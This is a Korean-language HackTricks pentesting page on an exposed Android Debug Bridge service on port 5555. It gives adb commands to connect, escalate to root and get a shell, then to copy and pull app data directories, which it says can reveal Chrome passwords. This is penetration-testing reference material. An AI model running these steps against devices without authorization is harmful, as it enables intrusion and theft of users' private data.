hacktricks/network-services-pentesting/5555-android-debug-bridge.md

5555 - 안드로이드 디버그 브리지

htARTE (HackTricks AWS Red Team Expert)를 통해 AWS 해킹을 처음부터 전문가까지 배워보세요!

HackTricks를 지원하는 다른 방법:

• 회사를 HackTricks에서 광고하거나 HackTricks를 PDF로 다운로드하려면 SUBSCRIPTION PLANS를 확인하세요!
• 공식 PEASS & HackTricks 스웨그를 얻으세요.
• The PEASS Family를 발견하세요. 독점적인 NFTs 컬렉션입니다.
• 💬 Discord 그룹 또는 텔레그램 그룹에 참여하거나 Twitter 🐦 @carlospolopm를 팔로우하세요.
• HackTricks와 HackTricks Cloud github 저장소에 PR을 제출하여 해킹 트릭을 공유하세요.

기본 정보

문서에서 알 수 있듯이:

안드로이드 디버그 브리지(adb)는 장치와 통신할 수 있는 다용도 명령줄 도구입니다. adb 명령은 앱을 설치하고 디버깅하는 등 다양한 장치 작업을 용이하게 해주며, Unix 쉘에 액세스하여 장치에서 다양한 명령을 실행할 수 있습니다.

기본 포트: 5555.

PORT     STATE SERVICE VERSION
5555/tcp open  adb     Android Debug Bridge device (name: msm8909; model: N3; device: msm8909)

연결하기

디바이스의 포트에서 실행 중인 ADB 서비스를 찾고 연결할 수 있다면, 시스템 내부에 쉘을 얻을 수 있습니다:

adb connect 10.10.10.10
adb root # Try to escalate to root
adb shell

더 많은 ADB 명령어를 확인하려면 다음 페이지를 참조하세요:

{% content-ref url="../mobile-pentesting/android-app-pentesting/adb-commands.md" %} adb-commands.md {% endcontent-ref %}

앱 데이터 덤프

앱의 데이터를 완전히 다운로드하려면 다음을 수행할 수 있습니다:

# From a root console
chmod 777 /data/data/com.package
cp -r /data/data/com.package /sdcard Note: Using ADB attacker cannot obtain data directly by using command " adb pull /data/data/com.package". He is compulsorily required to move data to Internal storage and then he can pull that data.
adb pull "/sdcard/com.package"

이 요령을 사용하여 크롬 비밀번호와 같은 민감한 정보를 검색할 수 있습니다. 이에 대한 자세한 정보는 여기에서 제공하는 정보를 확인하십시오.

Shodan

• 안드로이드 디버그 브리지

htARTE (HackTricks AWS Red Team Expert)를 통해 AWS 해킹을 처음부터 전문가까지 배워보세요!

HackTricks를 지원하는 다른 방법:

• 회사를 HackTricks에서 광고하거나 HackTricks를 PDF로 다운로드하려면 SUBSCRIPTION PLANS를 확인하세요!
• 공식 PEASS & HackTricks 스웨그를 얻으세요.
• The PEASS Family를 발견하세요. 독점적인 NFTs 컬렉션입니다.
• 💬 Discord 그룹 또는 텔레그램 그룹에 참여하거나 Twitter 🐦 @carlospolopm를 팔로우하세요.
• HackTricks와 HackTricks Cloud github 저장소에 PR을 제출하여 자신의 해킹 요령을 공유하세요.